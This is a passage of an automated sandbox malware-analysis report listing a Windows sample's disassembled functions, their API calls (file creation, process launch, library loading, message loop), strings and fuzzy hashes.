                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID: \
                                                            • API String ID: 3569833718-2967466578
                                                            • Opcode ID: d58ab3b514155339cf821853140559ad93f9cb8727cbca79bc1e42281516646c
                                                            • Instruction ID: 841ad6c544d7ca68260eb396a7a5f066248db02670b9fd0bc346d691ff9c7d2c
                                                            • Opcode Fuzzy Hash: d58ab3b514155339cf821853140559ad93f9cb8727cbca79bc1e42281516646c
                                                            • Instruction Fuzzy Hash: D831E471249B41AFF3119F20DC0AFAF7FACFB83706F000509F69196192E7685A0887B6
                                                            Function 0005E75F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 688 5e75f-5e777 call 5fe20 691 5e77d-5e789 call 64df3 688->691 692 5e9b8-5e9c0 688->692 691->692 695 5e78f-5e7b7 call 61000 691->695 698 5e7c1-5e7cf 695->698 699 5e7b9 695->699 700 5e7d1-5e7d4 698->700 701 5e7e2-5e7e8 698->701 699->698 702 5e7d8-5e7de 700->702 703 5e82b-5e82e 701->703 705 5e807-5e814 702->705 706 5e7e0 702->706 703->702 704 5e830-5e836 703->704 709 5e83d-5e83f 704->709 710 5e838-5e83b 704->710 707 5e990-5e992 705->707 708 5e81a-5e81e 705->708 711 5e7f2-5e7fc 706->711 714 5e996 707->714 708->714 715 5e824-5e829 708->715 716 5e852-5e868 call 4cd3c 709->716 717 5e841-5e848 709->717 710->709 710->716 712 5e7fe 711->712 713 5e7ea-5e7f0 711->713 712->705 713->711 720 5e800-5e803 713->720 721 5e99f 714->721 715->703 724 5e881-5e88c call 4b4a1 716->724 725 5e86a-5e877 call 532e6 716->725 717->716 718 5e84a 717->718 718->716 720->705 723 5e9a6-5e9a8 721->723 727 5e9b7 723->727 728 5e9aa-5e9ac 723->728 734 5e88e-5e8a5 call 4cab4 724->734 735 5e8a9-5e8b6 ShellExecuteExW 724->735 725->724 733 5e879 725->733 727->692 728->727 732 5e9ae-5e9b1 ShowWindow 728->732 732->727 733->724 734->735 735->727 737 5e8bc-5e8c9 735->737 739 5e8dc-5e8de 737->739 740 5e8cb-5e8d2 737->740 742 5e8f5-5e914 call 5ec0b 739->742 743 5e8e0-5e8e9 739->743 740->739 741 5e8d4-5e8da 740->741 741->739 744 5e94b-5e957 CloseHandle 741->744 742->744 757 5e916-5e91e 742->757 743->742 750 5e8eb-5e8f3 ShowWindow 743->750 746 5e959-5e966 call 532e6 744->746 747 5e968-5e976 744->747 746->721 746->747 747->723 749 5e978-5e97a 747->749 749->723 753 5e97c-5e982 749->753 750->742 753->723 756 5e984-5e98e 753->756 756->723 757->744 758 5e920-5e931 GetExitCodeProcess 757->758 758->744 759 5e933-5e93d 758->759 760 5e944 759->760 761 5e93f 759->761 760->744 761->760
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0005E77E
                                                            • ShellExecuteExW.SHELL32(?), ref: 0005E8AE
                                                            • ShowWindow.USER32(?,00000000), ref: 0005E8ED
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 0005E929
                                                            • CloseHandle.KERNEL32(?), ref: 0005E94F
                                                            • ShowWindow.USER32(?,00000001), ref: 0005E9B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                            • String ID: .exe$.inf
                                                            • API String ID: 36480843-3750412487
                                                            • Opcode ID: 3fbb5fd0f56f6796ca92f06183b37a20a4ae134b5bed912d04bda6f6801464a6
                                                            • Instruction ID: e401e57ed357cfe87b0e98d01955d17fc7ec01f4ebcd727f92a5c1dd4d899b62
                                                            • Opcode Fuzzy Hash: 3fbb5fd0f56f6796ca92f06183b37a20a4ae134b5bed912d04bda6f6801464a6
                                                            • Instruction Fuzzy Hash: A65116354087C09AEB749F20D844ABB7BE9AF45746F08082DFDC497191EF758A8DCB52
                                                            Function 0006B96B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 762 6b96b-6b984 763 6b986-6b996 call 6ff5c 762->763 764 6b99a-6b99f 762->764 763->764 771 6b998 763->771 765 6b9a1-6b9a9 764->765 766 6b9ac-6b9d0 MultiByteToWideChar 764->766 765->766 768 6b9d6-6b9e2 766->768 769 6bb63-6bb76 call 60bcc 766->769 772 6ba36 768->772 773 6b9e4-6b9f5 768->773 771->764 775 6ba38-6ba3a 772->775 776 6b9f7-6ba06 call 73020 773->776 777 6ba14-6ba25 call 6a64e 773->777 779 6ba40-6ba53 MultiByteToWideChar 775->779 780 6bb58 775->780 776->780 789 6ba0c-6ba12 776->789 777->780 790 6ba2b 777->790 779->780 783 6ba59-6ba6b call 6bf7c 779->783 784 6bb5a-6bb61 call 6bbd3 780->784 791 6ba70-6ba74 783->791 784->769 793 6ba31-6ba34 789->793 790->793 791->780 794 6ba7a-6ba81 791->794 793->775 795 6ba83-6ba88 794->795 796 6babb-6bac7 794->796 795->784 797 6ba8e-6ba90 795->797 798 6bb13 796->798 799 6bac9-6bada 796->799 797->780 800 6ba96-6bab0 call 6bf7c 797->800 801 6bb15-6bb17 798->801 802 6baf5-6bb06 call 6a64e 799->802 803 6badc-6baeb call 73020 799->803 800->784 817 6bab6 800->817 806 6bb51-6bb57 call 6bbd3 801->806 807 6bb19-6bb32 call 6bf7c 801->807 802->806 816 6bb08 802->816 803->806 815 6baed-6baf3 803->815 806->780 807->806 820 6bb34-6bb3b 807->820 819 6bb0e-6bb11 815->819 816->819 817->780 819->801 821 6bb77-6bb7d 820->821 822 6bb3d-6bb3e 820->822 823 6bb3f-6bb4f WideCharToMultiByte 821->823 822->823 823->806 824 6bb7f-6bb86 call 6bbd3 823->824 824->784
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00066959,00066959,?,?,?,0006BBBC,00000001,00000001,62E85006), ref: 0006B9C5
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0006BBBC,00000001,00000001,62E85006,?,?,?), ref: 0006BA4B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0006BB45
                                                            • __freea.LIBCMT ref: 0006BB52
                                                              • Part of subcall function 0006A64E: RtlAllocateHeap.NTDLL(00000000,?,?,?,000653E4,?,0000015D,?,?,?,?,000668C0,000000FF,00000000,?,?), ref: 0006A680
                                                            • __freea.LIBCMT ref: 0006BB5B
                                                            • __freea.LIBCMT ref: 0006BB80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: 29897f42fb21b0092f77f9c28cf4c8681f6d55b8797dcf3d6d9d170b18c6c79f
                                                            • Instruction ID: ce21d4f50278413b3770068f723e37b5088931361dfd0742d50b175fc193b129
                                                            • Opcode Fuzzy Hash: 29897f42fb21b0092f77f9c28cf4c8681f6d55b8797dcf3d6d9d170b18c6c79f
                                                            • Instruction Fuzzy Hash: 3151C0B2610216AAEB359F64CC41EBF77EBEB44750F154628FD08E7145DBB4DC8086A1
                                                            Function 0005BB90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 827 5bb90-5bbaf GetClassNameW 828 5bbd7-5bbd9 827->828 829 5bbb1-5bbc6 call 532e6 827->829 831 5bbe4-5bbe6 828->831 832 5bbdb-5bbdd 828->832 834 5bbd6 829->834 835 5bbc8-5bbd4 FindWindowExW 829->835 832->831 834->828 835->834
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000050), ref: 0005BBA7
                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 0005BBDE
                                                              • Part of subcall function 000532E6: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000132E6,0004D503,00000000,.exe,?,?,00000800,?,?,?,00059E2C), ref: 000532FC
                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0005BBCE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: @UJu$EDIT
                                                            • API String ID: 4243998846-1013725496
                                                            • Opcode ID: 07668d37ac76febbcb9e9bd301e459066e8d005d7cdb3b2799363f6532a28d58
                                                            • Instruction ID: adeaaf6261898ad1456179a6e94aaec48644caa3f494f3193cb49fb52a681aa9
                                                            • Opcode Fuzzy Hash: 07668d37ac76febbcb9e9bd301e459066e8d005d7cdb3b2799363f6532a28d58
                                                            • Instruction Fuzzy Hash: 4BF08232A00A287BE72056259C06FEF77ACAF46B42F444051FE05A2184D7E8EA0585F9
                                                            Function 0004AB20 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 836 4ab20-4ab41 call 5fe20 839 4ab43-4ab46 836->839 840 4ab4c 836->840 839->840 841 4ab48-4ab4a 839->841 842 4ab4e-4ab5f 840->842 841->842 843 4ab67-4ab71 842->843 844 4ab61 842->844 845 4ab76-4ab83 call 479c5 843->845 846 4ab73 843->846 844->843 849 4ab85 845->849 850 4ab8b-4abaa CreateFileW 845->850 846->845 849->850 851 4abac-4abce GetLastError call 4cf12 850->851 852 4abfb-4abff 850->852 855 4ac08-4ac0d 851->855 858 4abd0-4abf3 CreateFileW GetLastError 851->858 853 4ac03-4ac06 852->853 853->855 856 4ac19-4ac1e 853->856 855->856 859 4ac0f 855->859 860 4ac20-4ac23 856->860 861 4ac3f-4ac50 856->861 858->853 862 4abf5-4abf9 858->862 859->856 860->861 863 4ac25-4ac39 SetFileTime 860->863 864 4ac52-4ac6a call 51908 861->864 865 4ac6e-4ac79 861->865 862->853 863->861 864->865
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00048223,?,00000005,?,00000011), ref: 0004AB9F
                                                            • GetLastError.KERNEL32(?,?,00048223,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004ABAC
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00048223,?,00000005,?), ref: 0004ABE2
                                                            • GetLastError.KERNEL32(?,?,00048223,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004ABEA
                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00048223,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004AC39
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0
                                                            • Opcode ID: 18a68ede994cff022d8ec05de10625592841bb845e7dfe951d408994086f6d0f
                                                            • Instruction ID: a87bd29053010fe2829af7058bfc233b14a7d431ad9f7f190b6030c9d82dbc38
                                                            • Opcode Fuzzy Hash: 18a68ede994cff022d8ec05de10625592841bb845e7dfe951d408994086f6d0f
                                                            • Instruction Fuzzy Hash: AA314C70A84745AFE7709F24CC85BDABBD5FB06320F100729F9A4961D2D7B45884CBDA
                                                            Function 0005C5F8 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 895 5c5f8-5c611 PeekMessageW 896 5c613-5c627 GetMessageW 895->896 897 5c64c-5c64e 895->897 898 5c629-5c636 IsDialogMessageW 896->898 899 5c638-5c646 TranslateMessage DispatchMessageW 896->899 898->897 898->899 899->897
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C609
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005C61A
                                                            • IsDialogMessageW.USER32(0001046C,?), ref: 0005C62E
                                                            • TranslateMessage.USER32(?), ref: 0005C63C
                                                            • DispatchMessageW.USER32(?), ref: 0005C646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 1266772231-0
                                                            • Opcode ID: 582ad293a2e0701d8aa9f85a1bc32e93f124f05347fe641729f2d08c6f114b0d
                                                            • Instruction ID: 53873f5be34576eb14ab40a640afb443b4b032d0794882e8c795213d8e7b93b0
                                                            • Opcode Fuzzy Hash: 582ad293a2e0701d8aa9f85a1bc32e93f124f05347fe641729f2d08c6f114b0d
                                                            • Instruction Fuzzy Hash: 1DF0A972A01659AAAB209BE59C8CDDB7FBCFF066927004415B905D2010E668D509C7E0
                                                            Function 0005BCEB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00051B14: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B2F
                                                              • Part of subcall function 00051B14: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00050613,Crypt32.dll,00000000,0005068D,00000200,?,00050670,00000000,00000000,?), ref: 00051B51
                                                            • OleInitialize.OLE32(00000000), ref: 0005BD04
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0005BD3B
                                                            • SHGetMalloc.SHELL32(0008A460), ref: 0005BD45
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll
                                                            • API String ID: 3498096277-3360196438
                                                            • Opcode ID: 8ccd1ae00a58efb11a754b9ef4d8f5926a1c21fa586441d6d41ef26c090ff284
                                                            • Instruction ID: 59081b8e6e042cf71a5cf92aa1d26a95eddcc9c69125ec0641dcb9a757f89b68
                                                            • Opcode Fuzzy Hash: 8ccd1ae00a58efb11a754b9ef4d8f5926a1c21fa586441d6d41ef26c090ff284
                                                            • Instruction Fuzzy Hash: 9AF04FB1D00509ABDB10AFA9CC499EFFBFCFF85301F00401AE914A2201D7B85605CBA1
                                                            Function 00064BF2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 904 64bf2-64c07 LoadLibraryExW 905 64c3b-64c3c 904->905 906 64c09-64c12 GetLastError 904->906 907 64c14-64c28 call 672b8 906->907 908 64c39 906->908 907->908 911 64c2a-64c38 LoadLibraryExW 907->911 908->905
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,00064BA3,00000000,00000001,000A40C4,?,?,?,00064D46,00000004,InitializeCriticalSectionEx,00077424,InitializeCriticalSectionEx), ref: 00064BFF
                                                            • GetLastError.KERNEL32(?,00064BA3,00000000,00000001,000A40C4,?,?,?,00064D46,00000004,InitializeCriticalSectionEx,00077424,InitializeCriticalSectionEx,00000000,?,00064AFD), ref: 00064C09
                                                            • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00063A43), ref: 00064C31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID: api-ms-
                                                            • API String ID: 3177248105-2084034818
                                                            • Opcode ID: fd7916e4b1190a59388a8f060d3855206bd579ee16d2a0124a9ea860f0801fc8
                                                            • Instruction ID: b92a2d74e3e5b16f2ac82e33353127679e419ea2ac4c82b88ebb6b5bfd720d06
                                                            • Opcode Fuzzy Hash: fd7916e4b1190a59388a8f060d3855206bd579ee16d2a0124a9ea860f0801fc8
                                                            • Instruction Fuzzy Hash: C7E04830684209F7EF511F60EC06B593F95AB10B55F104020F90CB81F1DB6AD99195D4
                                                            Function 0004A9C5 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 912 4a9c5-4a9d1 913 4a9d3-4a9db GetStdHandle 912->913 914 4a9de-4a9f5 ReadFile 912->914 913->914 915 4a9f7-4aa00 call 4aafc 914->915 916 4aa51 914->916 920 4aa02-4aa0a 915->920 921 4aa19-4aa1d 915->921 918 4aa54-4aa57 916->918 920->921 924 4aa0c 920->924 922 4aa2e-4aa32 921->922 923 4aa1f-4aa28 GetLastError 921->923 926 4aa34-4aa3c 922->926 927 4aa4c-4aa4f 922->927 923->922 925 4aa2a-4aa2c 923->925 928 4aa0d-4aa17 call 4a9c5 924->928 925->918 926->927 930 4aa3e-4aa47 GetLastError 926->930 927->918 928->918 930->927 932 4aa49-4aa4a 930->932 932->928
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0004A9D5
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0004A9ED
                                                            • GetLastError.KERNEL32 ref: 0004AA1F
                                                            • GetLastError.KERNEL32 ref: 0004AA3E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: 47413daa3e8223f028fde2e86829dffaa63f18fd84c83e2cea559c705d35c749
                                                            • Instruction ID: 930a8d3ad2dba7d00cc5437ac43e23a81f73341eee32224c5350351b112f9544
                                                            • Opcode Fuzzy Hash: 47413daa3e8223f028fde2e86829dffaa63f18fd84c83e2cea559c705d35c749
                                                            • Instruction Fuzzy Hash: 3111A0B1B80214EBDF709F64DA04A6D37E9BB07320F104636F52A91190C7788DA4DB9B
                                                            Function 0006BD44 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 933 6bd44-6bd58 934 6bd65-6bd80 LoadLibraryExW 933->934 935 6bd5a-6bd63 933->935 937 6bd82-6bd8b GetLastError 934->937 938 6bda9-6bdaf 934->938 936 6bdbc-6bdbe 935->936 939 6bd8d-6bd98 LoadLibraryExW 937->939 940 6bd9a 937->940 941 6bdb1-6bdb2 FreeLibrary 938->941 942 6bdb8 938->942 943 6bd9c-6bd9e 939->943 940->943 941->942 944 6bdba-6bdbb 942->944 943->938 945 6bda0-6bda7 943->945 944->936 945->944
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0006524D,00000000,00000000,?,0006BCEB,0006524D,00000000,00000000,00000000,?,0006BEE8,00000006,FlsSetValue), ref: 0006BD76
                                                            • GetLastError.KERNEL32(?,0006BCEB,0006524D,00000000,00000000,00000000,?,0006BEE8,00000006,FlsSetValue,00078A00,FlsSetValue,00000000,00000364,?,0006A437), ref: 0006BD82
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0006BCEB,0006524D,00000000,00000000,00000000,?,0006BEE8,00000006,FlsSetValue,00078A00,FlsSetValue,00000000), ref: 0006BD90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 4191f38646966b593eb289db9e8bea7cde236b11cfd6332d9911f44c1d75763b
                                                            • Instruction ID: bf319bc982325aafcba2e84e647eec52df75a856999b6905961450ad772e4802
                                                            • Opcode Fuzzy Hash: 4191f38646966b593eb289db9e8bea7cde236b11cfd6332d9911f44c1d75763b
                                                            • Instruction Fuzzy Hash: 26017BB6A013229BD7304B38EC44A9B37D9FF017A17250220F90AEB151EB38DC80C7E0
                                                            Function 00052317 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 946 52317-52320 947 52392-52395 946->947 948 52322-52324 946->948 949 52327-52345 CreateThread 948->949 950 52347-52369 call 476c9 call 47851 call 476c4 949->950 951 5236e-5237d 949->951 950->951 952 5237f-52382 SetThreadPriority 951->952 953 52388-5238e 951->953 952->953 953->949 955 52390-52391 953->955 955->947
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00010000,Function_00012450,?,00000000,00000000), ref: 0005233B
                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 00052382
                                                              • Part of subcall function 000476C9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000476E7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
